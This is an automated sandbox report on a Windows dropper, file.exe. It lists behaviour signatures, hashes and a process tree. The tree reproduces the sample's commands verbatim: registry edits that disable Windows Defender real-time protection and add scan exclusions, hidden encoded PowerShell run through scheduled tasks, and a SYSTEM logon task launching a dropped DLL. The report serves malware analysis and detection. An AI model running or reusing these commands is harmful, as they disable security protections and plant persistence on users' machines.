Analysis
-
max time kernel
151s -
max time network
135s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
-
submitted
03-10-2022 04:01
General
-
Target
file.exe
-
Size
7.3MB
-
MD5
582c3cefde9a4dd644e687bf315fe89e
-
SHA1
dc1f560edc73d1d190e56ba14a9764102dc43662
-
SHA256
69dfb52da4eeb041285f40f1e3bc47b2aa3fe3df53fd44e55163ac7b00ac4720
-
SHA512
dca99c8323f2cc8ba508ec6099ea69dddb50745d4e063c3ace84dc0bd55d2d1794c0d79fab3c9aae08a1483af7db6ad36d9b3f9e407bd706e1fb0529f4939ec5
-
SSDEEP
196608:91Oq5DXMkYlnLY4sb03Tz1aVNAwxyTPiWV/cvIK5sT14SZg:3OebAKI3sVNAwxSiWV/cwK62cg
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 36 IoCs
-
Executes dropped EXE 4 IoCs
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Loads dropped DLL 8 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in System32 directory 8 IoCs
-
Drops file in Program Files directory 1 IoCs
-
Drops file in Windows directory 3 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 7 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies data under HKEY_USERS 9 IoCs
-
Suspicious behavior: EnumeratesProcesses 19 IoCs
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS59F3.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS6430.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Loads dropped DLL
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gocwxcMIB" /SC once /ST 02:41:33 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gocwxcMIB"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gocwxcMIB"4⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bGZpGlqvDNKjraWjlZ" /SC once /ST 06:03:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\byVTyzn.exe\" d8 /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\taskeng.exetaskeng.exe {A5E5AC8B-FE41-4058-B00D-9DFC649AA1A7} S-1-5-21-999675638-2867687379-27515722-1000:ORXGKKZC\Admin:Interactive:[1]1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force3⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {744831CD-C467-410D-A3DF-E7911A8A370D} S-1-5-18:NT AUTHORITY\System:Service:1⤵
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\byVTyzn.exeC:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\byVTyzn.exe d8 /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGStFiums" /SC once /ST 01:25:11 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGStFiums"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGStFiums"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gFSuubtqX" /SC once /ST 00:35:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gFSuubtqX"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gFSuubtqX"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\fwhiGQHhSfnZUzkc\IvpttUxu\XJDruOSiRrkabyiY.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\fwhiGQHhSfnZUzkc\IvpttUxu\XJDruOSiRrkabyiY.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\LCMDmHxGrLJHC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\VnSvEXTIbraTatzTOsR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\jIUrjTqJU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nVCmSimpmwUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\twylNxKJekDU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\CEEEIGvNcEpIBnVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\fwhiGQHhSfnZUzkc" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gItWToFsC" /SC once /ST 04:28:48 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gItWToFsC"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gItWToFsC"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "HqggdVJZxuzvaULcA" /SC once /ST 02:58:52 /RU "SYSTEM" /TR "\"C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\LguuXqT.exe\" Av /site_id 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "HqggdVJZxuzvaULcA"3⤵
-
C:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\LguuXqT.exeC:\Windows\Temp\fwhiGQHhSfnZUzkc\sjPeeWCTnrqbGVf\LguuXqT.exe Av /site_id 525403 /S2⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bGZpGlqvDNKjraWjlZ"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\jIUrjTqJU\gcLJmd.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "IyXvSOFErlMUKai" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\7zS59F3.tmp\Install.exeFilesize
6.2MB
MD5864642b4254490f43ee809197784991e
SHA1e8be14c5bd53974c8c6d2c879d5360aecd10afd1
SHA2560bf277ea41658db91f7ac8b2d4d182485d4b373401d8252f16fc1e05171e29cd
SHA512f8bf69d300ca714c5d91261c01bc3ff6590430d990216c6a3b6df56b825001f42418eed74f0ce1378252193bb66b11b1ef54f0c934371cc42657bf674b56320e
-
C:\Users\Admin\AppData\Local\Temp\7zS59F3.tmp\Install.exeFilesize
6.2MB
MD5864642b4254490f43ee809197784991e
SHA1e8be14c5bd53974c8c6d2c879d5360aecd10afd1
SHA2560bf277ea41658db91f7ac8b2d4d182485d4b373401d8252f16fc1e05171e29cd
SHA512f8bf69d300ca714c5d91261c01bc3ff6590430d990216c6a3b6df56b825001f42418eed74f0ce1378252193bb66b11b1ef54f0c934371cc42657bf674b56320e
-
C:\Users\Admin\AppData\Local\Temp\7zS6430.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\7zS6430.tmp\Install.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\byVTyzn.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Local\Temp\LhLAIbjVjtdXSeCjh\NRKtMpzzQqeBbPa\byVTyzn.exeFilesize
6.8MB
MD56f52a47480dae7c97a64dd5aebb8e426
SHA1204fe492e1cdeacea89a4f3b2cf41626053bc992
SHA256a506223f4ca78c5c90ca3e02d00a1fef0e74b7050712c2a5e7ebaa160fa6c879
SHA512994468252493276e3f3ebde2f03153d16f862ce3277f234785116394f570bec1e9bd7e49e40321957b7289f6bdb85a06871bbb162a552285c0b812a54fe5d78c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
